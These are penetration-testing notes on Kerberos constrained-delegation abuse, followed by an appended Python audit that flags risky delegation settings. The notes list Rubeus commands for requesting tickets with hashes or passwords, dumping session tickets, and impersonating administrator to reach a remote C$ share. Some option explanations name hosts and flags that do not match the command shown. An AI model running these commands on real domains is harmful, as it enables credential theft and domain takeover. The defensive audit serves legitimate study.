Constrained Delegation

Constrained delegation was introduced as a safer form of Kerberos delegation. It restricts the set of services to which a server may present itself on behalf of a user (listed in the account's msDS-AllowedToDelegateTo attribute). The server no longer caches other users' TGTs; instead it uses its own TGT to request a service ticket (TGS) for the user through the S4U2Self and S4U2Proxy extensions.

# Verify
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Generate TGT Ticket With User Credentials
Rubeus.exe asktgt /user:workstation1$ /rc4:<NTLM Hash>
Rubeus.exe asktgt /user:sqlservice /password:P@ssw0rd

# Generate TGT Ticket With User Session OR Dumping
Rubeus.exe tgtdeleg
Rubeus.exe triage
Rubeus.exe dump

# Command
Rubeus.exe s4u /impersonateuser:administrator /msdsspn:time/workstation1.marvel.local /altservice:cifs /opsec /ptt /ticket:<TICKET>

beacon> ls \\wkstn-2.dev.cyberbotic.io\c$

  • /impersonateuser is the user we want to impersonate. nlamb is a domain admin, but whichever user you choose must have local admin access on the target (WKSTN-2).

  • /msdsspn is the service principal name that SRV-2 is allowed to delegate to.

  • /user is the principal allowed to perform the delegation.

  • /aes256 is the AES256 key of the /user.

  • /opsec tells Rubeus to more closely mimic genuine S4U2Self and S4U2Proxy requests (can only be used together with /aes256, not an RC4 hash).

  • /ptt tells Rubeus to pass the generated tickets directly into the current logon session.
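Added defender-side audit example, not part of these notes: given LDAP-style account records like those Get-DomainUser -TrustedToAuth returns, it flags every account configured for constrained delegation, rates those with protocol transition (the TRUSTED_TO_AUTH_FOR_DELEGATION bit, which lets S4U2Self obtain tickets for arbitrary users) as high risk, shows that each msDS-AllowedToDelegateTo entry exposes every service on the listed host (the /altservice point above), and lists sensitive accounts missing the "cannot be delegated" flag. The account names and SPNs are constructed sample data; the userAccountControl bit values are the real ones.

```python
# Constrained-delegation audit over constructed LDAP-style records (added example).
# userAccountControl bits (real values from MS-SAMR):
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # "Use any authentication protocol" (protocol transition)
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
NORMAL_ACCOUNT = 0x200

def parse_spn(spn):
    """Split 'service/host[:port][/name]' into (service, host), lower-cased.
    The KDC does not bind the service class into the S4U2Proxy ticket, so the
    host is what matters for risk (hence Rubeus' /altservice)."""
    service, _, rest = spn.partition("/")
    host = rest.split(":")[0].split("/")[0]
    return service.lower(), host.lower()

def audit_delegation(accounts):
    """One finding per account that has msDS-AllowedToDelegateTo populated."""
    findings = []
    for acct in accounts:
        targets = acct.get("msDS-AllowedToDelegateTo") or []
        if not targets:
            continue
        protocol_transition = bool(acct["userAccountControl"] & TRUSTED_TO_AUTH_FOR_DELEGATION)
        findings.append({
            "account": acct["sAMAccountName"],
            "protocol_transition": protocol_transition,
            # any service on these hosts is reachable, not only the listed service class
            "hosts_reachable": sorted({parse_spn(s)[1] for s in targets}),
            "risk": "HIGH" if protocol_transition else "MEDIUM",
        })
    return findings

def unprotected_sensitive(accounts, sensitive_names):
    """Sensitive accounts lacking NOT_DELEGATED: these can be impersonated via S4U.
    Mitigation is to set the flag or add them to Protected Users."""
    return sorted(a["sAMAccountName"] for a in accounts
                  if a["sAMAccountName"] in sensitive_names
                  and not a["userAccountControl"] & NOT_DELEGATED)

# Constructed sample data (hostnames reuse the ones in the notes above).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "sqlservice",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["time/workstation1.marvel.local", "time/workstation1"]},
    {"sAMAccountName": "websvc", "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["cifs/wkstn-2.dev.cyberbotic.io"]},
    {"sAMAccountName": "administrator", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "nlamb", "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED},
]

if __name__ == "__main__":
    for f in audit_delegation(SAMPLE_ACCOUNTS):
        print(f)
    print("unprotected:", unprotected_sensitive(SAMPLE_ACCOUNTS, {"administrator", "nlamb"}))
```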
